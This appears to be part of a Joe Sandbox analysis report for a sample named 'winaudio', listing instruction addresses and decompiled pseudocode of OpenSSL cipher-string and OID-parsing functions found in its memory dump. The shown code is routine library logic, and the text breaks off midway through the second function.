                        0x00000000
                        0x00000000
                        0x003894f5
                        0x003895bc
                        0x003895c1
                        0x003895c4
                        0x003895c8
                        0x003895c9
                        0x003895cc
                        0x003895cf
                        0x003895d0
                        0x003895d3
                        0x003895d6
                        0x003895d9
                        0x003895dc
                        0x003895dc
                        0x003895e4
                        0x003895e8
                        0x003895eb
                        0x003895ec
                        0x003895ee
                        0x003895f0
                        0x003895f5
                        0x00389600
                        0x00389600
                        0x00389606
                        0x00389609
                        0x0038960a
                        0x0038960a
                        0x00389600
                        0x0038960e
                        0x00389610
                        0x00389612
                        0x00389614
                        0x00389614
                        0x00389616
                        0x0038961a
                        0x00000000
                        0x00000000
                        0x0038961c
                        0x0038961c
                        0x0038961f
                        0x00389621
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00389621
                        0x00389614
                        0x00389623
                        0x0038962d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00389338
                        0x003891c2
                        0x003891c2
                        0x003891c5
                        0x003891c8
                        0x003891cb
                        0x003891fc
                        0x003891fe
                        0x00389249
                        0x0038924b
                        0x00389252
                        0x00389259
                        0x0038925c
                        0x0038925f
                        0x00389261
                        0x00389265
                        0x00389265
                        0x00389266
                        0x00389269
                        0x00389270
                        0x00389279
                        0x0038927e
                        0x00389281
                        0x00389286
                        0x00389289
                        0x0038928b
                        0x00389290
                        0x00389293
                        0x00389296
                        0x00389296
                        0x00389296
                        0x0038929a
                        0x0038929d
                        0x0038929d
                        0x003892a2
                        0x003892a2
                        0x003892ad
                        0x003892b8
                        0x003892b8
                        0x003892bb
                        0x003892c7
                        0x003892cc
                        0x003892d7
                        0x003892d9
                        0x003892db
                        0x003892e1
                        0x003892e6
                        0x003892e8
                        0x003892ee
                        0x00389200
                        0x0038920c
                        0x0038920c
                        0x0038920f
                        0x0038921f
                        0x00389225
                        0x0038922c
                        0x0038922e
                        0x00389236
                        0x00389238
                        0x0038923a
                        0x0038923f
                        0x00389242
                        0x00389248
                        0x00389248
                        0x003891cd
                        0x003891d0
                        0x003891d4
                        0x003891da
                        0x003891e9
                        0x003891f3
                        0x003891fb
                        0x003891fb
                        0x003891cb
                        0x003891a6
                        0x003891a9
                        0x003891af
                        0x003891af
                        0x00389195
                        0x0038919b
                        0x0038919b

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: cQ9$cQ9
                        • API String ID: 0-3585417646
                        • Opcode ID: 9e4bfc5fc13bdc1941a68870fadd0e35170eb5593d762ae5e2728317ab4cd285
                        • Instruction ID: be8c907a82449c65e4261d40825aedb452ef0e90d0582455dcd110235816dae2
                        • Opcode Fuzzy Hash: 9e4bfc5fc13bdc1941a68870fadd0e35170eb5593d762ae5e2728317ab4cd285
                        • Instruction Fuzzy Hash: EC021E71E002199FDF15DFA9C8807ADB7F5EF88324F2941AAD919EB284D731AD41CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00358F40 Relevance: 2.9, Strings: 2, Instructions: 359COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 45%
                        			E00358F40() {
				void* __edi;
				signed int _t105;
				void* _t109;
				signed int _t111;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int* _t125;
				signed int _t127;
				signed int* _t128;
				intOrPtr _t130;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t136;
				signed int _t138;
				signed int _t142;
				signed int _t149;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int* _t168;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				signed int* _t175;
				signed int _t178;
				signed int _t183;
				void* _t186;

				E00397C10();
				_t178 =  *(_t186 + 0x3c);
				 *(_t186 + 0x2c) = 0;
				 *(_t186 + 0xc) = 1;
				_t105 =  *_t178;
				if(_t105 == 0) {
					return 1;
				} else {
					do {
						if(_t105 != 0x2d) {
							__eflags = _t105 - 0x2b;
							if(_t105 != 0x2b) {
								__eflags = _t105 - 0x21;
								if(_t105 != 0x21) {
									__eflags = _t105 - 0x40;
									if(_t105 != 0x40) {
										 *(_t186 + 0x24) = 1;
										_t171 = 1;
										 *(_t186 + 0x20) = 1;
										 *(_t186 + 0x1c) = 1;
										__eflags = _t105 - 0x3a;
										if(_t105 == 0x3a) {
											L105:
											_t178 = _t178 + 1;
											__eflags = _t178;
											goto L106;
										} else {
											__eflags = _t105 - 0x20;
											if(_t105 == 0x20) {
												goto L105;
											} else {
												__eflags = _t105 - 0x3b;
												if(_t105 == 0x3b) {
													goto L105;
												} else {
													__eflags = _t105 - 0x2c;
													if(_t105 == 0x2c) {
														goto L105;
													} else {
														goto L14;
													}
												}
											}
										}
									} else {
										_t171 = 5;
										 *(_t186 + 0x24) = 5;
										_t178 = _t178 + 1;
										 *(_t186 + 0x20) = 5;
										 *(_t186 + 0x1c) = 5;
										goto L14;
									}
								} else {
									_t171 = 2;
									 *(_t186 + 0x24) = 2;
									_t178 = _t178 + 1;
									 *(_t186 + 0x20) = 2;
									 *(_t186 + 0x1c) = 2;
									goto L14;
								}
							} else {
								_t171 = 4;
								 *(_t186 + 0x24) = 4;
								_t178 = _t178 + 1;
								 *(_t186 + 0x20) = 4;
								 *(_t186 + 0x1c) = 4;
								goto L14;
							}
						} else {
							_t171 = 3;
							 *(_t186 + 0x24) = 3;
							_t178 = _t178 + 1;
							 *(_t186 + 0x20) = 3;
							 *(_t186 + 0x1c) = 3;
							L14:
							_t166 = 0;
							 *(_t186 + 0x34) = 0;
							_t149 = 0;
							 *(_t186 + 0x30) = 0;
							 *(_t186 + 0x2c) = 0;
							 *(_t186 + 0x28) = 0;
							 *(_t186 + 0x48) = 0;
							while(1) {
								_t157 = _t178;
								 *(_t186 + 0x14) = _t149;
								 *(_t186 + 0x10) = _t178;
								_t183 = 0;
								while(1) {
									L16:
									_t109 =  *_t178;
									if(_t109 >= 0x41 && _t109 <= 0x5a) {
									}
									L24:
									_t178 = _t178 + 1;
									_t183 = _t183 + 1;
									L16:
									_t109 =  *_t178;
									if(_t109 >= 0x41 && _t109 <= 0x5a) {
									}
									L18:
									if(_t109 >= 0x30 && _t109 <= 0x39) {
										goto L24;
									}
									if(_t109 >= 0x61 && _t109 <= 0x7a) {
										goto L24;
									}
									if(_t109 == 0x2d || _t109 == 0x2e) {
										goto L24;
									}
									__eflags = _t183;
									if(__eflags == 0) {
										E002E5840(_t166, _t171, __eflags, 0x14, 0xe6, 0x118, ".\\ssl\\ssl_ciph.c", 0x4c6);
										_t172 = 0;
										_t186 = _t186 + 0x14;
										 *((intOrPtr*)(_t186 + 0x18)) = 0;
										_t178 = _t178 + 1;
										goto L40;
									} else {
										__eflags = _t171 - 5;
										if(_t171 == 5) {
											_t172 = 0;
										} else {
											__eflags = _t109 - 0x2b;
											if(_t109 != 0x2b) {
												 *(_t186 + 0x3c) = 0;
											} else {
												 *(_t186 + 0x3c) = 1;
												_t178 = _t178 + 1;
											}
											_t125 =  *(_t186 + 0x54);
											_t152 = 0;
											_t172 = 0;
											 *(_t186 + 0x38) = 0;
											 *(_t186 + 0x40) = 0;
											__eflags =  *_t125;
											if( *_t125 == 0) {
												_t149 =  *(_t186 + 0x14);
											} else {
												_t175 = _t125;
												asm("o16 nop [eax+eax]");
												do {
													_t127 = E003850F0(_t157,  *((intOrPtr*)( *_t175 + 4)), _t183);
													_t186 = _t186 + 0xc;
													__eflags = _t127;
													if(_t127 != 0) {
														goto L34;
													} else {
														_t130 =  *((intOrPtr*)( *_t175 + 4));
														__eflags =  *((char*)(_t130 + _t183));
														if( *((char*)(_t130 + _t183)) == 0) {
															_t172 = 1;
															_t168 = ( *(_t186 + 0x54))[_t152];
															_t131 = _t168[3];
															__eflags = _t131;
															if(_t131 == 0) {
																L47:
																_t132 = _t168[4];
																__eflags = _t132;
																if(_t132 == 0) {
																	L52:
																	_t133 = _t168[5];
																	__eflags = _t133;
																	if(_t133 == 0) {
																		L57:
																		_t134 = _t168[6];
																		__eflags = _t134;
																		if(_t134 == 0) {
																			L62:
																			_t158 = _t168[8];
																			_t153 =  *(_t186 + 0x14);
																			_t136 = _t158 & 0x00000003;
																			__eflags = _t136;
																			if(_t136 == 0) {
																				L67:
																				_t138 = _t158 & 0x000001fc;
																				__eflags = _t138;
																				if(_t138 == 0) {
																					L72:
																					_t141 =  ==  ? _t153 : _t153 | 0x00000200;
																					__eflags =  *_t168;
																					_t149 =  ==  ? _t153 : _t153 | 0x00000200;
																					if( *_t168 == 0) {
																						_t142 = _t168[7];
																						__eflags = _t142;
																						if(_t142 == 0) {
																							goto L74;
																						} else {
																							_t169 =  *(_t186 + 0x48);
																							__eflags = _t169;
																							if(_t169 == 0) {
																								_t166 = _t142;
																								 *(_t186 + 0x48) = _t166;
																								goto L75;
																							} else {
																								_t166 = _t169 & _t142;
																								__eflags = _t166;
																								 *(_t186 + 0x48) = _t166;
																								if(_t166 != 0) {
																									goto L75;
																								} else {
																									_t172 = 0;
																									goto L41;
																								}
																							}
																						}
																					} else {
																						 *(_t186 + 0x38) = _t168[2];
																						L74:
																						_t166 =  *(_t186 + 0x48);
																						L75:
																						__eflags =  *(_t186 + 0x3c);
																						if( *(_t186 + 0x3c) == 0) {
																							goto L41;
																						} else {
																							_t171 =  *(_t186 + 0x1c);
																							_t157 = _t178;
																							 *(_t186 + 0x14) = _t149;
																							 *(_t186 + 0x10) = _t178;
																							_t183 = 0;
																							goto L16;
																						}
																					}
																				} else {
																					__eflags = _t153 & 0x000001fc;
																					if((_t153 & 0x000001fc) == 0) {
																						_t153 = _t153 | _t138;
																						__eflags = _t153;
																						goto L72;
																					} else {
																						_t149 = _t153 & (_t158 | 0xfffffe03);
																						__eflags = _t149 & 0x000001fc;
																						if((_t149 & 0x000001fc) == 0) {
																							goto L65;
																						} else {
																							goto L72;
																						}
																					}
																				}
																			} else {
																				__eflags = _t153 & 0x00000003;
																				if((_t153 & 0x00000003) == 0) {
																					_t153 = _t153 | _t136;
																					__eflags = _t153;
																					goto L67;
																				} else {
																					_t153 = _t153 & (_t158 | 0xfffffffc);
																					__eflags = _t153 & 0x00000003;
																					if((_t153 & 0x00000003) != 0) {
																						goto L67;
																					} else {
																						L65:
																						_t172 = 0;
																						goto L40;
																					}
																				}
																			}
																		} else {
																			_t154 =  *(_t186 + 0x28);
																			__eflags = _t154;
																			if(_t154 == 0) {
																				 *(_t186 + 0x28) = _t134;
																				goto L62;
																			} else {
																				_t155 = _t154 & _t134;
																				__eflags = _t155;
																				 *(_t186 + 0x28) = _t155;
																				if(_t155 == 0) {
																					goto L39;
																				} else {
																					goto L62;
																				}
																			}
																		}
																	} else {
																		_t160 =  *(_t186 + 0x2c);
																		__eflags = _t160;
																		if(_t160 == 0) {
																			 *(_t186 + 0x2c) = _t133;
																			goto L57;
																		} else {
																			_t161 = _t160 & _t133;
																			__eflags = _t161;
																			 *(_t186 + 0x2c) = _t161;
																			if(_t161 == 0) {
																				goto L39;
																			} else {
																				goto L57;
																			}
																		}
																	}
																} else {
																	_t162 =  *(_t186 + 0x30);
																	__eflags = _t162;
																	if(_t162 == 0) {
																		 *(_t186 + 0x30) = _t132;
																		goto L52;
																	} else {
																		_t163 = _t162 & _t132;
																		__eflags = _t163;
																		 *(_t186 + 0x30) = _t163;
																		if(_t163 == 0) {
																			goto L39;
																		} else {
																			goto L52;
																		}
																	}
																}
															} else {
																_t164 =  *(_t186 + 0x34);
																__eflags = _t164;
																if(_t164 == 0) {
																	 *(_t186 + 0x34) = _t131;
																	goto L47;
																} else {
																	_t165 = _t164 & _t131;
																	__eflags = _t165;
																	 *(_t186 + 0x34) = _t165;
																	if(_t165 != 0) {
																		goto L47;
																	} else {
																		L39:
																		_t149 =  *(_t186 + 0x14);
																		_t172 = 0;
																		__eflags = 0;
																		L40:
																		_t166 =  *(_t186 + 0x48);
																		L41:
																		_t157 =  *(_t186 + 0x10);
																	}
																}
															}
														} else {
															goto L34;
														}
													}
													goto L42;
													L34:
													_t128 =  *(_t186 + 0x54);
													_t152 = _t152 + 1;
													__eflags = _t128[_t152];
													_t157 =  *(_t186 + 0x10);
													_t175 =  &(_t128[_t152]);
												} while (_t128[_t152] != 0);
												_t149 =  *(_t186 + 0x14);
												_t172 =  *(_t186 + 0x40);
												_t166 =  *(_t186 + 0x48);
											}
										}
									}
									L42:
									__eflags =  *(_t186 + 0x20) - 5;
									if( *(_t186 + 0x20) != 5) {
										__eflags = _t172;
										if(_t172 == 0) {
											_t111 =  *_t178;
											__eflags = _t111;
											if(_t111 == 0) {
												goto L107;
											} else {
												while(1) {
													__eflags = _t111 - 0x3a;
													if(_t111 == 0x3a) {
														goto L93;
													}
													__eflags = _t111 - 0x20;
													if(_t111 == 0x20) {
														goto L93;
													} else {
														__eflags = _t111 - 0x3b;
														if(_t111 == 0x3b) {
															goto L93;
														} else {
															__eflags = _t111 - 0x2c;
															if(_t111 == 0x2c) {
																goto L93;
															} else {
																_t111 =  *(_t178 + 1);
																_t178 = _t178 + 1;
																__eflags = _t111;
																if(_t111 != 0) {
																	continue;
																} else {
																	return  *((intOrPtr*)(_t186 + 0x18));
																}
															}
														}
													}
													goto L109;
												}
												goto L93;
											}
										} else {
											_push( *((intOrPtr*)(_t186 + 0x50)));
											_push( *((intOrPtr*)(_t186 + 0x50)));
											_push(0xffffffff);
											_push( *(_t186 + 0x30));
											_push(_t149);
											_push(_t166);
											_push( *(_t186 + 0x2c));
											_push( *(_t186 + 0x48));
											_push( *((intOrPtr*)(_t186 + 0x50)));
											_push( *((intOrPtr*)(_t186 + 0x58)));
											_push( *((intOrPtr*)(_t186 + 0x60)));
											E003583F0();
											_t186 = _t186 + 0x2c;
											goto L93;
										}
									} else {
										_t174 = 0;
										__eflags = _t183 - 8;
										if(__eflags != 0) {
											L85:
											E002E5840(_t166, _t174, __eflags, 0x14, 0xe6, 0x118, ".\\ssl\\ssl_ciph.c", 0x562);
											_t186 = _t186 + 0x14;
										} else {
											_t123 = E003850F0(_t157, "STRENGTH", _t183);
											_t186 = _t186 + 0xc;
											__eflags = _t123;
											if(__eflags != 0) {
												goto L85;
											} else {
												_push( *((intOrPtr*)(_t186 + 0x50)));
												_push( *((intOrPtr*)(_t186 + 0x50)));
												_t124 = E003593A0(_t166, 0);
												_t186 = _t186 + 8;
												_t174 = _t124;
											}
										}
										__eflags = _t174;
										_t121 =  !=  ?  *((void*)(_t186 + 0x18)) : 0;
										 *((intOrPtr*)(_t186 + 0x18)) =  !=  ?  *((void*)(_t186 + 0x18)) : 0;
										_t122 =  *_t178;
										__eflags = _t122;
										if(_t122 != 0) {
											while(1) {
												__eflags = _t122 - 0x3a;
												if(_t122 == 0x3a) {
													goto L93;
												}
												__eflags = _t122 - 0x20;
												if(_t122 != 0x20) {
													__eflags = _t122 - 0x3b;
													if(_t122 != 0x3b) {
														__eflags = _t122 - 0x2c;
														if(_t122 != 0x2c) {
															_t122 =  *(_t178 + 1);
															_t178 = _t178 + 1;
															__eflags = _t122;
															if(_t122 != 0) {
																continue;
															}
														}
													}
												}
												goto L93;
											}
										}
										L93:
										__eflags =  *_t178;
										if( *_t178 == 0) {
											goto L107;
										} else {
											goto L106;
										}
									}
									goto L109;
								}
							}
						}
						goto L109;
						L106:
						_t105 =  *_t178;
						__eflags = _t105;
					} while (_t105 != 0);
					L107:
					return  *((intOrPtr*)(_t186 + 0x18));
				}
				L109:
			}










































                        0x00358f45
                        0x00358f4b
                        0x00358f51
                        0x00358f5a
                        0x00358f5e
                        0x00358f62
                        0x00359391
                        0x00358f68
                        0x00358f70
                        0x00358f72
                        0x00358f93
                        0x00358f95
                        0x00358fb3
                        0x00358fb5
                        0x00358fd3
                        0x00358fd5
                        0x00358ff3
                        0x00358ffb
                        0x00359000
                        0x00359008
                        0x0035900c
                        0x0035900e
                        0x00359374
                        0x00359374
                        0x00359374
                        0x00000000
                        0x00359014
                        0x00359014
                        0x00359016
                        0x00000000
                        0x0035901c
                        0x0035901c
                        0x0035901e
                        0x00000000
                        0x00359024
                        0x00359024
                        0x00359026
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00359026
                        0x0035901e
                        0x00359016
                        0x00358fd7
                        0x00358fd7
                        0x00358fdc
                        0x00358fe4
                        0x00358fe5
                        0x00358fed
                        0x00000000
                        0x00358fed
                        0x00358fb7
                        0x00358fb7
                        0x00358fbc
                        0x00358fc4
                        0x00358fc5
                        0x00358fcd
                        0x00000000
                        0x00358fcd
                        0x00358f97
                        0x00358f97
                        0x00358f9c
                        0x00358fa4
                        0x00358fa5
                        0x00358fad
                        0x00000000
                        0x00358fad
                        0x00358f74
                        0x00358f74
                        0x00358f79
                        0x00358f81
                        0x00358f82
                        0x00358f8a
                        0x0035902c
                        0x0035902e
                        0x00359030
                        0x00359034
                        0x00359036
                        0x0035903a
                        0x0035903e
                        0x00359042
                        0x00359046
                        0x00359046
                        0x00359048
                        0x0035904c
                        0x00359050
                        0x00359052
                        0x00359052
                        0x00359052
                        0x00359056
                        0x00359056
                        0x00359074
                        0x00359074
                        0x00359075
                        0x00359052
                        0x00359052
                        0x00359056
                        0x00359056
                        0x0035905c
                        0x0035905e
                        0x00000000
                        0x00000000
                        0x00359066
                        0x00000000
                        0x00000000
                        0x0035906e
                        0x00000000
                        0x00000000
                        0x00359078
                        0x0035907a
                        0x0035929d
                        0x003592a2
                        0x003592a4
                        0x003592a7
                        0x003592ab
                        0x00000000
                        0x00359080
                        0x00359080
                        0x00359083
                        0x00359280
                        0x00359089
                        0x00359089
                        0x0035908b
                        0x00359098
                        0x0035908d
                        0x0035908d
                        0x00359095
                        0x00359095
                        0x003590a0
                        0x003590a4
                        0x003590a6
                        0x003590a8
                        0x003590ac
                        0x003590b0
                        0x003590b2
                        0x003592b1
                        0x003590b8
                        0x003590b8
                        0x003590ba
                        0x003590c0
                        0x003590c7
                        0x003590cc
                        0x003590cf
                        0x003590d1
                        0x00000000
                        0x003590d3
                        0x003590d5
                        0x003590d8
                        0x003590dc
                        0x00359102
                        0x00359107
                        0x0035910a
                        0x0035910d
                        0x0035910f
                        0x00359177
                        0x00359177
                        0x0035917a
                        0x0035917c
                        0x00359194
                        0x00359194
                        0x00359197
                        0x00359199
                        0x003591b5
                        0x003591b5
                        0x003591b8
                        0x003591ba
                        0x003591d6
                        0x003591d6
                        0x003591db
                        0x003591df
                        0x003591df
                        0x003591e2
                        0x003591fe
                        0x00359200
                        0x00359200
                        0x00359205
                        0x00359224
                        0x00359231
                        0x00359234
                        0x00359237
                        0x00359239
                        0x0035925a
                        0x0035925d
                        0x0035925f
                        0x00000000
                        0x00359261
                        0x00359261
                        0x00359265
                        0x00359267
                        0x00359278
                        0x0035927a
                        0x00000000
                        0x00359269
                        0x00359269
                        0x00359269
                        0x0035926b
                        0x0035926f
                        0x00000000
                        0x00359271
                        0x00359271
                        0x00000000
                        0x00359271
                        0x0035926f
                        0x00359267
                        0x0035923b
                        0x0035923e
                        0x00359242
                        0x00359242
                        0x00359246
                        0x00359246
                        0x0035924b
                        0x00000000
                        0x00359251
                        0x00359251
                        0x00359046
                        0x00359048
                        0x0035904c
                        0x00359050
                        0x00000000
                        0x00359050
                        0x0035924b
                        0x00359207
                        0x00359207
                        0x0035920d
                        0x00359222
                        0x00359222
                        0x00000000
                        0x0035920f
                        0x00359216
                        0x00359218
                        0x0035921e
                        0x00000000
                        0x00359220
                        0x00000000
                        0x00359220
                        0x0035921e
                        0x0035920d
                        0x003591e4
                        0x003591e4
                        0x003591e7
                        0x003591fc
                        0x003591fc
                        0x00000000
                        0x003591e9
                        0x003591ee
                        0x003591f0
                        0x003591f3
                        0x00000000
                        0x003591f5
                        0x003591f5
                        0x003591f5
                        0x00000000
                        0x003591f5
                        0x003591f3
                        0x003591e7
                        0x003591bc
                        0x003591bc
                        0x003591c0
                        0x003591c2
                        0x003591d2
                        0x00000000
                        0x003591c4
                        0x003591c4
                        0x003591c4
                        0x003591c6
                        0x003591ca
                        0x00000000
                        0x003591d0
                        0x00000000
                        0x003591d0
                        0x003591ca
                        0x003591c2
                        0x0035919b
                        0x0035919b
                        0x0035919f
                        0x003591a1
                        0x003591b1
                        0x00000000
                        0x003591a3
                        0x003591a3
                        0x003591a3
                        0x003591a5
                        0x003591a9
                        0x00000000
                        0x003591af
                        0x00000000
                        0x003591af
                        0x003591a9
                        0x003591a1
                        0x0035917e
                        0x0035917e
                        0x00359182
                        0x00359184
                        0x00359190
                        0x00000000
                        0x00359186
                        0x00359186
                        0x00359186
                        0x00359188
                        0x0035918c
                        0x00000000
                        0x0035918e
                        0x00000000
                        0x0035918e
                        0x0035918c
                        0x00359184
                        0x00359111
                        0x00359111
                        0x00359115
                        0x00359117
                        0x00359173
                        0x00000000
                        0x00359119
                        0x00359119
                        0x00359119
                        0x0035911b
                        0x0035911f
                        0x00000000
                        0x00359121
                        0x00359121
                        0x00359121
                        0x00359125
                        0x00359125
                        0x00359127
                        0x00359127
                        0x0035912b
                        0x0035912b
                        0x0035912b
                        0x0035911f
                        0x00359117
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003590dc
                        0x00000000
                        0x003590de
                        0x003590de
                        0x003590e2
                        0x003590e3
                        0x003590e7
                        0x003590eb
                        0x003590eb
                        0x003590f0
                        0x003590f4
                        0x003590f8
                        0x003590f8
                        0x003590b2
                        0x00359083
                        0x0035912f
                        0x0035912f
                        0x00359134
                        0x0035930f
                        0x00359311
                        0x00359346
                        0x00359348
                        0x0035934a
                        0x00000000
                        0x00359350
                        0x00359350
                        0x00359350
                        0x00359352
                        0x00000000
                        0x00000000
                        0x00359354
                        0x00359356
                        0x00000000
                        0x00359358
                        0x00359358
                        0x0035935a
                        0x00000000
                        0x0035935c
                        0x0035935c
                        0x0035935e
                        0x00000000
                        0x00359360
                        0x00359360
                        0x00359363
                        0x00359364
                        0x00359366
                        0x00000000
                        0x00359368
                        0x00359373
                        0x00359373
                        0x00359366
                        0x0035935e
                        0x0035935a
                        0x00000000
                        0x00359356
                        0x00000000
                        0x00359350
                        0x00359313
                        0x00359313
                        0x0035931b
                        0x0035931f
                        0x00359321
                        0x00359325
                        0x00359326
                        0x00359327
                        0x0035932c
                        0x00359331
                        0x00359336
                        0x0035933b
                        0x0035933c
                        0x00359341
                        0x00000000
                        0x00359341
                        0x0035913a
                        0x0035913a
                        0x0035913c
                        0x0035913f
                        0x003592ba
                        0x003592d0
                        0x003592d5
                        0x00359145
                        0x0035914c
                        0x00359151
                        0x00359154
                        0x00359156
                        0x00000000
                        0x0035915c
                        0x0035915c
                        0x00359160
                        0x00359164
                        0x00359169
                        0x0035916c
                        0x0035916c
                        0x00359156
                        0x003592da
                        0x003592dc
                        0x003592e1
                        0x003592e5
                        0x003592e7
                        0x003592e9
                        0x003592f0
                        0x003592f0
                        0x003592f2
                        0x00000000
                        0x00000000
                        0x003592f4
                        0x003592f6
                        0x003592f8
                        0x003592fa
                        0x003592fc
                        0x003592fe
                        0x00359300
                        0x00359303
                        0x00359304
                        0x00359306
                        0x00000000
                        0x00000000
                        0x00359306
                        0x003592fe
                        0x003592fa
                        0x00000000
                        0x003592f6
                        0x003592f0
                        0x00359308
                        0x00359308
                        0x0035930b
                        0x00000000
                        0x0035930d
                        0x00000000
                        0x0035930d
                        0x0035930b
                        0x00000000
                        0x00359134
                        0x00359052
                        0x00359046
                        0x00000000
                        0x00359375
                        0x00359375
                        0x00359377
                        0x00359377
                        0x0035937f
                        0x0035938a
                        0x0035938a
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: .\ssl\ssl_ciph.c$STRENGTH
                        • API String ID: 0-4120156686
                        • Opcode ID: 3577536530bc8610f920f1afa73eccc9895099c0737e4dfaf1e0c551223bb64b
                        • Instruction ID: 4a51f21d36eaf3d9c17efdc6a195e462b8f42bbc6b7b8538b66edd967a0ceacc
                        • Opcode Fuzzy Hash: 3577536530bc8610f920f1afa73eccc9895099c0737e4dfaf1e0c551223bb64b
                        • Instruction Fuzzy Hash: BAC1C374608305CFDB26CF19C884F66B7E5BB89306F56092EECC58B2A1D375C94A8B42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002F05E0 Relevance: 2.8, Strings: 2, Instructions: 297COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 55%
                        			E002F05E0(void* __ebx, signed int __edx, void* __edi) {
				void* __esi;
				signed int _t63;
				signed int _t67;
				signed int _t72;
				signed int _t75;
				signed int _t81;
				void* _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t91;
				signed int _t97;
				signed char _t100;
				signed int _t101;
				signed int _t102;
				signed int _t107;
				signed int _t111;
				void* _t114;
				void* _t117;
				signed int _t119;
				intOrPtr _t126;
				signed int _t128;
				void* _t132;
				void* _t133;
				signed int _t134;
				intOrPtr* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;
				intOrPtr* _t140;
				void* _t142;
				signed int _t144;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				signed int _t158;

				_t124 = __edx;
				E00397C10();
				_t63 =  *0x3e1008; // 0x847b54ee
				 *(_t154 + 0x38) = _t63 ^ _t154;
				_t97 =  *(_t154 + 0x44);
				 *(_t154 + 8) = _t97;
				 *(_t154 + 0xc) = 0;
				_t144 =  *(_t154 + 0x4c);
				 *(_t154 + 8) = _t144;
				_push(__edi);
				_t126 =  *((intOrPtr*)(_t154 + 0x54));
				if(_t97 != 0 && _t144 > 0) {
					 *_t97 = 0;
				}
				if(_t126 == 0 ||  *(_t126 + 0x10) == 0) {
					__eflags =  *(_t154 + 0x44) ^ _t154;
					return E002E056D( *(_t154 + 0x44) ^ _t154, _t124, _t132);
				} else {
					_push(_t132);
					if( *((intOrPtr*)(_t154 + 0x58)) != 0) {
						L14:
						_t111 =  *(_t126 + 0xc);
						_t67 =  *(_t126 + 0x10);
						_t128 = 0;
						 *(_t154 + 0x28) = 1;
						__eflags = _t111;
						if(_t111 <= 0) {
							L72:
							_pop(_t133);
							__eflags =  *(_t154 + 0x38) ^ _t154;
							return E002E056D( *(_t154 + 0x38) ^ _t154, _t124, _t133);
						} else {
							while(1) {
								L15:
								_t134 = 0;
								_t147 = 0;
								asm("o16 nop [eax+eax]");
								while(1) {
									_t100 =  *_t67;
									_t70 = _t67 + 1;
									_t111 = _t111 - 1;
									__eflags = _t111;
									 *(_t154 + 0x24) = _t67 + 1;
									 *(_t154 + 0x20) = _t111;
									if(_t111 != 0) {
										goto L18;
									}
									L17:
									__eflags = _t100;
									if(_t100 < 0) {
										L67:
										__eflags = _t128;
										if(_t128 != 0) {
											_t70 = E002F9760(_t128);
											_t154 = _t154 + 4;
										}
										L69:
										_pop(_t137);
										__eflags =  *(_t154 + 0x38) ^ _t154;
										return E002E056D( *(_t154 + 0x38) ^ _t154, _t124, _t137);
									} else {
										goto L18;
									}
									goto L74;
									L18:
									_t72 = _t100 & 0x7f;
									__eflags = _t147;
									if(_t147 == 0) {
										_t134 = _t134 | _t72;
										__eflags = _t134;
										goto L22;
									} else {
										_t70 = E00306F30(_t124, _t128, _t72);
										_t154 = _t154 + 8;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L67;
										} else {
											_t111 =  *(_t154 + 0x20);
											L22:
											__eflags = _t100;
											if(_t100 >= 0) {
												__eflags =  *(_t154 + 0x28);
												if( *(_t154 + 0x28) == 0) {
													_t101 =  *(_t154 + 0x14);
													goto L44;
												} else {
													 *(_t154 + 0x28) = 0;
													__eflags = _t134 - 0x50;
													if(_t134 < 0x50) {
														_t124 = 0xcccccccd * _t134 >> 0x20;
														_t119 = 0xcccccccd * _t134 >> 0x20 >> 5;
														_t134 = _t134 + _t119 * 0xffffffd8;
														__eflags = _t134;
														goto L39;
													} else {
														_t119 = 2;
														 *(_t154 + 0x1c) = 2;
														__eflags = _t147;
